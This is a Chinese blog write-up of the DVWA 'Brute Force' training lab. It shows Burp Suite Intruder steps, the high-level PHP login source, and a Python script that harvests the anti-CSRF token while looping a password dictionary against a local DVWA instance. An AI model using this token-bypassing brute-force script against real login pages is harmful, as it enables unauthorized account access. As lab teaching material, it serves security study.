DVWA-Brute Force(暴力破解)

最新推荐文章于 2023-05-20 22:06:03 发布
最新推荐文章于 2023-05-20 22:06:03 发布
阅读量514 收藏 2
点赞数 1
分类专栏: DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42636435/article/details/88747192
版权

Brute Force(暴力破解)

介绍

暴力破解其实没有什么神秘的,也是大家都有的一个四位方式,比如说我们有时候会忘记我们的手机密码,这个时候我们就会从我们之前使用的密码中一个个去试着解锁,这就是暴力破解的精髓所在了,也就是枚举猜解。所以暴力破解的前提就是你有一个强大的字典,字典就是我们已知的一些用户名和密码,我们会通过这个字典来猜解。

low

我们可以直接使用burp suite的intruder模块进行暴力测试。具体操作如下:首先给浏览器设置代理,然后通过burp suite抓包,然后在抓到的数据包内容处单击鼠标右键,会弹出一个功能栏,然后选择send to intruder,这样我们的数据包就被发送到了intruder模块。

在这里插入图片描述

在这里我们可以选择需要暴力测试的参数。我们只需要暴力破解username与password:
在这里插入图片描述

接下来就是设置我们的payloads了(这里我只是演示,在真实环境下,往往需要很强大的字典才能够猜解成功):

在这里插入图片描述

字典设置好过后,这个时候就可以开始攻击了,点击右上角的start attack。结果如下:

在这里插入图片描述

我们可以从图中看到有两个返回的数据包的length长度与其它的都不一样,这很有可能就是正确爆破后得到的结果,具体是不是成功了,我们可以点击那一次请求,burpsuite会弹出请求的具体内容与返回内容,我们就可以根据页面内容进行判断是否攻击成功。

medium

中级的使用low等级中提到的burp suite爆破的方法同样凑效 。

在这里插入图片描述

High

我一开始使用burp suite按照我们之前的方法进行爆破时,总是会出现302跳转,看了源码后终于发现,问题就出在源码出现的第一个函数checkToken() 上,可以看到这个函数检查了两个变量user_token与session_token 。通过抓包,可以看到,登录验证时提交了四个参数:username、password、Login以及user_token。

<?php 

if( isset( $_GET[ 'Login' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Sanitise username input 
    $user = $_GET[ 'username' ]; 
    $user = stripslashes( $user ); 
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 

    // Sanitise password input 
    $pass = $_GET[ 'password' ]; 
    $pass = stripslashes( $pass ); 
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 
    $pass = md5( $pass ); 

    // Check database 
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); 

    if( $result && mysqli_num_rows( $result ) == 1 ) { 
        // Get users details 
        $row    = mysqli_fetch_assoc( $result ); 
        $avatar = $row["avatar"]; 

        // Login successful 
        echo "<p>Welcome to the password protected area {$user}</p>"; 
        echo "<img src=\"{$avatar}\" />"; 
    } 
    else { 
        // Login failed 
        sleep( rand( 0, 3 ) ); 
        echo "<pre><br />Username and/or password incorrect.</pre>"; 
    } 

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

在这里插入图片描述

整个checkToken()函数就是判断我们客户端提交的token与服务端的token是否一致,不一致则跳转到index.php,这样做的目的就是为了预防无脑的爆破,现在我们就不能像之前那样,直接用burp suite请求了,因为每一次合法请求需要的user_token都不一样,我们现在想要利用就需要每次都得到这个有效的user_token,有两个解决办法:

A:由于加入了Anti-CSRFtoken预防无脑爆破,这里就不推荐用Burpsuite了

B:自己写一个脚本

#! /usr/bin/env/python
# #-*-coding:utf-8-*-
import requests
from bs4 import BeautifulSoup
#字典
payloads = [ 'administrator', 'admin', 'password', 'passwd', '123456', '123' ]
url = """http://192.168.5.5/dvwa/vulnerabilities/brute/?username={0}&password={1}&Login=Login&user_token={2}#"""
cookies = { 'security':'high',
           'PHPSESSID':'cd1fggfc0bi84c3lh7kpsh98g2',
           'mask':'123' }
headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36', }
def attack(payloads,url):
   #先要获得user_token
   source = 'http://localhost/dvwa/vulnerabilities/brute/index.php#'
   index = 0
   web_data = requests.get(source,headers = headers,cookies=cookies)#请求必须带上cookie,因为dvwa需要登陆
   soup = BeautifulSoup(web_data.text, 'lxml')
   user_token = soup.select('input[name="user_token"]')[0]['value']
   #从字典枚举
   for payload1 in payloads:
       for payload2 in payloads:
           target = url.format(payload1,payload2,user_token)
           print (u'当前请求:'+target)
           web_data = requests.get(target,headers = headers,cookies=cookies)
           soup = BeautifulSoup(web_data.text,'lxml')
           user_token = soup.select('input[name="user_token"]')[0]['value']
           feature = soup.find('pre')
           try:
               if feature.get_text()=='Username and/or password incorrect.':#错误的密码或者用户名就会页面会出现此语句,这也是我们需要检索的
                   print (u'错误')
           except:
               print (u'可能得到结果:')
               print ('username:'+payload1+'\n'+'password:'+payload2)
               exit(u'结束')
if __name__ == '__main__':
   attack(payloads,url)
MzHeader
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一、Burte Force暴力破解
weixin_59584646的博客
07-01 1010
暴力破解”是一种攻击手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。
BP暴力破解,302重定向怎么解决
山兔的博客
04-11 1200
DVWA —— Brute Force 暴力破解
YouTheFreedom的博客
05-20 2432
由于没有对登录页面进行相关的防暴力破解机制,如无验证码、有验证码但验证码未在服务器端校验以及无登录错误次数限制等,导致攻击者可通过暴力破解获取用户登录账户及口令,从而获取网站登录访问权限
BurpSuite解决爆破时候全是302的方法
https://www.cnblogs.com/zpchcbd/
09-16 8642
有时候爆破会遇到多个302跳转BurpSuite有一个设置可以跟随跳转 这样子设置了 burp就会跟到302跳转的界面 返回不同的页面长度 以此来进行判断
黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第五章 WEB黑客(4)暴力破解HTML表单身份验证
阿尔泰野狼的博客
10-12 674
本文记录了博主在阅读Black Hat Python 2nd Edition过程中的心得以及踩坑经历。
DVWA-Brute Force @ Burpsuite.docx
06-27
DVWA-Brute Force @ Burpsuite.docx
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA_bruteForce工具_官网下载_Bruter_1.1.zip
09-18
DVWABruteForce板块所需要用到的暴力破解工具。 日常暴力破解小能手。谁用谁知道。
实验1-DVWA部署暴力破解.docx
01-05
利用Kali Linux对DVWABrute Force模块展开实验,包括: 1) Low等级、Medium等级的手工破解、自动化破解;(40分) 2) High等级的自己撰写工具自动化破解;(40分) 3) Impossible等级的机制以及修复、防御暴力破解...
Technicolor-Thomson-Router-Bruter:这是一个POC,演示攻击者如何使用脚本通过网关将脚本暴力破解为多个TechnicolorThomson路由器
02-20
彩色汤姆逊路由器布鲁特 这是一个POC,展示了攻击者如何使用脚本通过网关将其暴力破解成多个Technicolor / Thomson路由器。
Bruter_1.1.rar
03-24
Bruter暴力破解表单。是DVWA中的测试工具。软件很简单,
基于安卓平台的校园通软件设计—毕业论文
04-02
基于安卓平台的校园通软件设计—毕业论文 有主要源代码和前中期检查完成任务
020-2021 Winter holiday Training Round 1
qq_45772483的博客
01-23 324
A - AD 2020 2020 is the current year and is a leap year starting on Wednesday of the Gregorian calendar, the 2020th year of the Common Era (CE) and Anno Domini (AD) designations, the 20th year of the 3rd millennium, the 20th year of the 21st century, and t
漏洞挖掘与防范(基础篇)SQL注入漏洞
烟敛寒林的博客
01-05 923
本文记录代码审计的学习过程。 教程为《代码审计-企业级Web代码安全架构》,练习靶场为DVWA、Sqli-labs-master和Bugku。 目录 一、挖掘 1. 普通注入 2. 编码注入 二、防范 1. 开启gpc/rutime魔术引号 2. 过滤函数和类 3. PDO prepare 预编译 4. 关键字过滤 SQL注入漏洞是我们知道的最...
暴力破解与验证码安全之——暴力猜解概述
温柔小薛的博客
04-14 1725
暴力猜解概述 暴力猜解简单来说就是将密码进行逐个推算,直到找出真正的密码为止 暴力破解注意事项 破解前一定要有一个有郊的字典(Top100 TOP2000 csdn QQ 163等密码);判断用户是否设置了复杂的密码、网站是否存在验证码、尝试登录的行为是否有限制、网站是否双因素认证(等保中对管理员后台的要求,例如只允许某个IP访问,通过堡垒机,手机短信等)、Token值等等 对目标网站进行注册,...
暴力破解与验证码安全之——CS架暴力猜解
温柔小薛的博客
04-14 836
CS架暴力猜解 指软件,数据库,操作系统,3389相关的破解。C/S 即客户端/服务器,基于 C/S 架构的应用程序 如 ssh ftp sql-server mysql 等,这些服务往往提供一个高权限的用户,而这个高权限的用户往往可以进行执行命令的操作,如sql-server 的 sa ,mysql 的 root,oracle 的 sys 和 system帐号,使用这些高权限的用户能在很大程度...
暴力破解原理与过程详解
weixin_30561177的博客
09-06 6126
一、爆破原理 顾名思义,暴力破解的原理就是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。因为理论上来说,只要字典足够庞大,枚举总是能够成功的! 但实际发送的数据并不像想象中的那样简单——“ 每次只向服务器发送用户名和密码字段即可!”,实际情况是每次发送的数据都必须要封装成完整的 HTTP 数据包才能被服务器接收。但是你不可能一个一个去手动构造数据包,所以在实施暴力破解之前,...
暴力破解_burp
94小菜
01-04 1509
目录简介漏洞挖掘绕过修复建议案例1、基于无效验证码的暴力破解JSON格式的登录基于token的暴力破解认证登录 简介     描述: 将密码进行逐个推算,直到找出真正的密码为止     分类: BS架构(浏览器)、CS架构(客户端)     工具: burp、Hydra、Bruter等 漏洞挖掘 准备工作: 需要强大的字典(包括默认的账号密码) 网站登录密码的复杂度(注册页面可看) 验证
dvwa通关brute force
最新发布
06-08
DVWA中,Brute Force挑战是关于用户登录部分的一个环节,主要是测试用户的密码暴力破解能力。 当你遇到Brute Force关卡时,目标是尝试使用各种可能的用户名和密码组合,直到找到正确的登录凭证。这通常涉及到编写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值